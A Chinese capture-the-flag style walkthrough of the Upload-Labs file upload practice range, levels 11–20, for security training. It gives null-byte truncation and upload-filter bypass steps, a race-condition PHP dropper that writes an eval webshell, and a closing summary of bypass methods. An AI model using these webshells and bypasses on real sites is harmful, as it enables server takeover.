Upload-Labs靶场攻略(下)

Pass-11

GET型传参,上传目录可设置,考虑00截断,在/upload/后添加1.php%00,即可上传

Pass-12

POST型传参,上传目录可设置,POST型会不会进行URL编码,所以在/upload/后添加1.php%00,并且将%00用URL进行编码。编码后为空白符号,即可上传

Pass-13

文件包含,上传图片码1.jpg,利用文件包含将JPG内容当作PHP进行解析

生成图片码命令

copy 1.jpg /b + 1.php /a 2.jpg

192.168.28.128/uploadlab/include.php?file=upload/1420210717064745.png

Pass-14

同第13关

Pass-15

同14关

Pass-16

二次渲染,依旧上传图片码,找到未被渲染的位置,用C32将一句话木马插入。依旧上传,采用文件包含即可。

Pass-17

条件竞争,服务器端将上传的文件进行先保存再判断,如果正确则重命名,否则删除。

通过爆破持续上传,然后通过访问,生成新的木马文件。

上传的木马如下:

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST[123]) ?>’);
?>

上传后进行爆破访问,生成webshell.php即为后门文件

Pass-18

图片马加条件竞争,先上传图片马,然后通过文件包含访问图片马,生产Webshell文件

Pass-19

%00截断,方法同Pass-12

Pass-20

进行代码审计,类似CTF

MIME首先得是image/png、image/gif、image/jpg

   if (!is_array($file)) {
$file = explode('.', strtolower($file));
}

会根据.将$file先转化为小写再打散成数组。

     $ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}

会对数组中最后一个值进行判断是否是jpg,png,gif结尾

            $file_name = reset($file) . '.' . $file[count($file) - 1];

将数组的第一个值和倒数第二个值进行拼接。

所以我们考虑数组的最后一个值必须是jpg,第一个和第二个值还需要再考虑

   if (move_uploaded_file($temp_file, $img_path)) {
$msg = "文件上传成功!";
$is_upload = true;
}

这边可以看到将临时文件存储再img_path,所以img_path其实可以根据传入的save_name[]数组进行操控。

而move_uploaded_file在执行的时候会忽略末尾的/.,所以根据拼接

save_name[0]=web.php/

save_name[1]为空

save_name[2]=jpg

注意POST上传改包的数据包型式即可。

总结:文件上传的种类和手法:

1.前端JS验证:禁用JS,Burp抓包修改

2.只检查Content-type,修改MIME

3.黑名单绕过:爆破尾缀

4.系统配置文件重写,.htaccess,.nginx

5.大小写绕过、尾缀添加点,空格,下划线绕过,添加::$DATA

6.过滤敏感词汇使用双写绕过

7.上传目录可控可以使用00截断,GET传参不需要编码,POST需要进行编码成为空白

8.存在文件包含漏洞可上传图片马,进行包含

9.条件竞争是服务器处理上的逻辑漏洞,需要爆破上传和爆破访问

10.代码审计需要理清楚一步一步的上传逻辑

Upload-labs 文件上传靶场通关攻略(下)的更多相关文章

  1. Upload-labs 文件上传靶场通关攻略(上)

    Upload-labs 文件上传靶场通关攻略(上) 文件上传是Web网页中常见的功能之一,通常情况下恶意的文件上传,会形成漏洞. 逻辑是这样的:用户通过上传点上传了恶意文件,通过服务器的校验后保存到指 ...

  2. Web文件上传靶场 - 通关笔记

    Web应用程序通常会提供一些上传功能,比如上传头像,图片资源等,只要与资源传输有关的地方就可能存在上传漏洞,上传漏洞归根结底是程序员在对用户文件上传时控制不足或者是处理的缺陷导致的,文件上传漏洞在渗透 ...

  3. DVWA靶场之File Upload(文件上传)通关

    Low: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_pa ...

  4. 【DVWA】File Upload(文件上传漏洞)通关教程

    日期:2019-08-01 17:28:33 更新: 作者:Bay0net 介绍: 0x01. 漏洞介绍 在渗透测试过程中,能够快速获取服务器权限的一个办法. 如果开发者对上传的内容过滤的不严,那么就 ...

  5. upload.php --->文件上传

    <?php header("Content-type:text/html;charset=utf-8"); print_r($_FILES['file']); $filena ...

  6. PHP系列 | Thinkphp3.2 上传七牛 bad token 问题 [ layui.upload 图片/文件上传]

    前端代码 <div class="logo_out" id="upload-logo"></div> JS代码 /** * 上传图片 * ...

  7. DVWA全级别之File Upload(文件上传)

    File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带 ...

  8. File Upload(文件上传)

    一句话木马 <?php @eval($_POST['key']); ?> /*eval(phpcode) eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP ...

  9. 从本地向 Github 上传项目步骤攻略(快速上手版)

    最近想把之前自己做的一些好玩的项目共享到Github,网上找了一圈上传教程,都感觉写的太深奥.复杂,云里雾里,特把自己的方法纪录如下: PS:这种方式一般适用于:开始做项目时,没有直接在github上 ...

随机推荐

  1. Terraform模块Module管理,聚合资源的抽取与复用

    我最新最全的文章都在南瓜慢说 www.pkslow.com,欢迎大家来喝茶! 1 简介 最近工作中用到了Terraform,权当学习记录一下,希望能帮助到其它人. Terraform系列文章如下: T ...

  2. Windows10 准备/安装Flutter研发环境

    Flutter简介 Flutter 是 Google 开源的 UI 工具包,帮助开发者通过一套代码库高效构建多平台精美应用,支持移动.Web.桌面和嵌入式平台. Flutter 中国 安装Flutte ...

  3. 6.11、制作windos虚拟机

    1.下载kvm支持windows系统的驱动程序: cd /tmp/ wget https://fedorapeople.org/groups/virt/virtio-win/direct-downlo ...

  4. 42、mysql数据库(函数)

    1.mysql中提供的内置函数: (1)数学函数: 1)ROUND(x,y): 返回参数x的四舍五入的有y位小数的值.x不可转换时返回0,x为null时返回null. 2)RAND(): 返回0到1内 ...

  5. 什么样的CRM系统适合以客户为中心的企业?

    我们不难发现,现代的企业非常依赖CRM系统,这是因为20%的优质客户能够给企业带来80%的利润,而老客户的推荐可以带来60%的客户增长.那么,什么样的CRM系统适合企业?随着信息技术的发展,客户开始拥 ...

  6. 自己动手模拟spring的IOC

    我们这里是模拟spring,主要模拟spring中的IOC功能,所以在此我们一样要在service层中定义dao的实例,当然不用new出来,我们就通过spring的IOC把这里的dao层注入进来.不要 ...

  7. Linux安装telnet(转)

      一.安装telnet 1.检测telnet-server的rpm包是否安装 [root@localhost ~]# rpm -qa telnet-server 若无输入内容,则表示没有安装.出于安 ...

  8. MyBatis框架中的条件查询!关键字exists用法的详细解析

    exists用法 exists: 如果括号内子查询语句返回结果不为空,说明where条件成立,就会执行主SQL语句 如果括号内子查询语句返回结果为空,说明where条件不成立,就不会执行主SQL语句 ...

  9. ESP32-任务看门狗笔记

    看门狗机制用于监控嵌入式系统运行并在发生不可知的软硬件故障时将系统复位.系统正常运行时,看门狗定时器溢出之前会被重置计数值,也就是"喂狗".定时器溢出意味着无法"喂狗&q ...

  10. ESP32-FAT文件系统使用磨损均衡存储文件笔记

    基于ESP-IDF4.1 1 /* 2 FAT文件系统存储文件,使用磨损均衡库wear-leveling 3 */ 4 5 #include <stdlib.h> 6 #include & ...